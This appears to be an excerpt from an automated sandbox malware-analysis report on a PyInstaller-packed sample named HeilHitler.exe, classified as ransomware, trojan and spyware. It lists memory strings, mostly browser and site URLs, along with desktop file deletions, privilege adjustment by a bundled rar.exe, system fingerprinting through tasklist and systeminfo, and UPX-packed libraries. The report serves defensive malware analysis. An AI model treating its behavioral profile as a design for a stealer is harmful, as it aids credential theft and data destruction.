              Source: HeilHitler.exe, 00000001.00000003.1751574081.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018087656.000001BD4374D000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43D0C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1756978835.000001BD4374B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1733099301.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1754056720.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=b0
              Source: HeilHitler.exe, 00000001.00000003.1754056720.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1906535342.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018689250.000001BD4366B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750287762.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907735236.000001BD43666000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1746940897.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030610587.000001BD4366E000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1733099301.000001BD437E1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750052219.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030858383.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907250502.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1756378160.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
              Source: HeilHitler.exe, 00000001.00000003.1754056720.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c0
              Source: HeilHitler.exe, 00000001.00000003.1742219198.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c0C
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: HeilHitler.exe, 00000001.00000002.2030858383.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_cr
              Source: HeilHitler.exe, 00000001.00000003.1754435836.000001BD4364F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4364F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: HeilHitler.exe, 00000001.00000003.1742219198.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1754435836.000001BD4364F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4364F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: HeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp, HeilHitler.exe, 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: HeilHitler.exe, 00000000.00000003.1678922666.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
              Source: HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD4348C000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD43498000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50937
              Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\ONBQCLYSPU.xlsx
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\KZWFNRXYKI.mp3
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\KZWFNRXYKI.mp3
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\XZXHAVGRAG.docx
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\KATAXZVCPS.png
              Source: cmd.exeProcess created: 49

              System Summary

              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C1D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 68_2_00007FF702C1D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C4B57C: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 68_2_00007FF702C4B57C
              Source: HeilHitler.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: HeilHitler.exeBinary or memory string: OriginalFilename vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678668051.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678458745.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000000.1677023971.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsra.exej% vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678252343.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1681133155.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1680725372.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678076504.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678337779.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678569630.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1680619720.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1677368472.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1677584002.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678764252.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs HeilHitler.exe
              Source: HeilHitler.exeBinary or memory string: OriginalFilename vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038435153.00007FFE11528000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2040367940.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2039278900.00007FFE126FC000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2037694871.00007FFE0EB6D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2037394805.00007FFDFB8A0000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038962389.00007FFE11EE8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2040120021.00007FFE13323000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038719112.00007FFE11ECE000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000000.1681928618.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsra.exej% vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2039781620.00007FFE130CC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038035078.00007FFE10313000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2039519511.00007FFE12E1C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2036329876.00007FFDFB42E000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HeilHitler.exe
              Source: HeilHitler.exeBinary or memory string: OriginalFilenamemsra.exej% vs HeilHitler.exe
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
               Source: libcrypto-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
               Source: libssl-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
               Source: python310.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9989695677157001
               Source: sqlite3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9974986001493175
               Source: unicodedata.pyd.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9949597928113553
               Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@139/52@2/2
               Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C1CAFC GetLastError,FormatMessageW
               Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C4B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
               Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C1EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
               Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C23144 GetDiskFreeSpaceExW
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
               Source: C:\Users\user\Desktop\HeilHitler.exe | Mutant created: \Sessions\1\BaseNamedObjects\I
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
               Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
               Source: C:\Users\user\Desktop\HeilHitler.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI74322
               Source: HeilHitler.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
               Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
               Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
               Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
               Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
               Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
               Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | File read: C:\Users\desktop.ini
               Source: C:\Users\user\Desktop\HeilHitler.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
               Source: HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
               Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
               Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
